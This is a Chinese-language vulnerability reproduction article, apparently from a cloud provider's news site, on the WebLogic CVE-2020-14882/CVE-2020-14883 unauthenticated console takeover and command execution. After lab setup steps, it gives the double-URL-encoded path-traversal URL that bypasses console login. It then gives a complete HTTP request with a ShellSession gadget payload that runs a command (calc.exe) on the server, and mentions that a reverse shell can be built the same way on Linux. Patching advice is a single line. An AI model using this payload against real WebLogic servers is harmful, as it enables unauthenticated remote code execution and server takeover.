您好,登錄后才能下訂單哦!
今天就跟大家聊聊有關(guān)如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。
WebLogic是美國(guó)Oracle公司出品的一個(gè)application server,確切的說(shuō)是一個(gè)基于JAVAEE架構(gòu)的中間件,WebLogic是用于開(kāi)發(fā)、集成、部署和管理大型分布式Web應(yīng)用、網(wǎng)絡(luò)應(yīng)用和數(shù)據(jù)庫(kù)應(yīng)用的Java應(yīng)用服務(wù)器。將Java的動(dòng)態(tài)功能和Java Enterprise標(biāo)準(zhǔn)的安全性引入大型網(wǎng)絡(luò)應(yīng)用的開(kāi)發(fā)、集成、部署和管理之中。
Weblogic對(duì)比Tomcat
遠(yuǎn)程攻擊者可以構(gòu)造特殊的HTTP請(qǐng)求,在未經(jīng)身份驗(yàn)證的情況下接管 WebLogic Server Console,并在 WebLogic Server Console 執(zhí)行任意代碼。
遠(yuǎn)程攻擊者可以構(gòu)造特殊的HTTP請(qǐng)求,在未經(jīng)身份驗(yàn)證的情況下接管 WebLogic Server Console。
Oracle:Weblogic:
10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
Windows2016+WebLogic12.2.1.4
1.在Oracle官方下載,WebLogic12.2.1.4版本
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
2.安裝weblogic需要java環(huán)境,這里java版本為jdk1.8.0_191
3.java環(huán)境安裝完成后使用管理員權(quán)限運(yùn)行WebLogic安裝
java -jar fmw_12.2.1.4.0_wls_lite_generic.jar
4.安裝時(shí)選擇下一步即可,在“安裝類(lèi)型”中選擇“含示例的完整安裝”
5.在配置向?qū)е?,設(shè)置密碼,點(diǎn)擊創(chuàng)建即可
6.安裝完成后,在瀏覽器訪問(wèn)127.0.0.1:7001/console 出現(xiàn)如下界面即可
1.1 低權(quán)限的用戶訪問(wèn)以下URL,通過(guò)未授權(quán)訪問(wèn)到管理后臺(tái)頁(yè)面
http://192.168.207.149:7001/console/css/%252e%252e%252fconsole.portal
2.1 在首頁(yè)使用burp抓取數(shù)據(jù)包,然后發(fā)送到Repeater模塊構(gòu)造payload
2.2 在url處通過(guò)非法字符繞過(guò)訪問(wèn),然后通過(guò)Gadget調(diào)用命令執(zhí)行
Payload: /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
完整數(shù)據(jù)包如下:
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22) HTTP/1.1
Host: 192.168.207.149:7001
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=_i6RW6CkwbR8Zr7DOmC0qhwkfhOdOVZiWlubIcjtgogLbSWVXCAl!-1560292457; think_lang=zh-cn; PHPSESSID=0701339d3e42f0edcf094f63a3919f90; JSESSIONID=z3-RYQeKtqCOmUfkcph5xyWXJWfYJQ-6E19wRWMHtS2JPtA14MaH!-1560292457
Connection: close
3. 點(diǎn)擊“發(fā)送”,在服務(wù)器稍等一下可以看到彈出了計(jì)算器
注:在linux中可以通過(guò)構(gòu)造payload實(shí)現(xiàn)反彈shell
1. 在Oracle官方下載最新的漏洞補(bǔ)丁
https://support.oracle.com/portal/
看完上述內(nèi)容,你們對(duì)如何實(shí)現(xiàn)WebLogic未授權(quán)命令執(zhí)行漏洞CVE-2020-14882及CVE-2020-14883的分析有進(jìn)一步的了解嗎?如果還想了解更多知識(shí)或者相關(guān)內(nèi)容,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝大家的支持。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。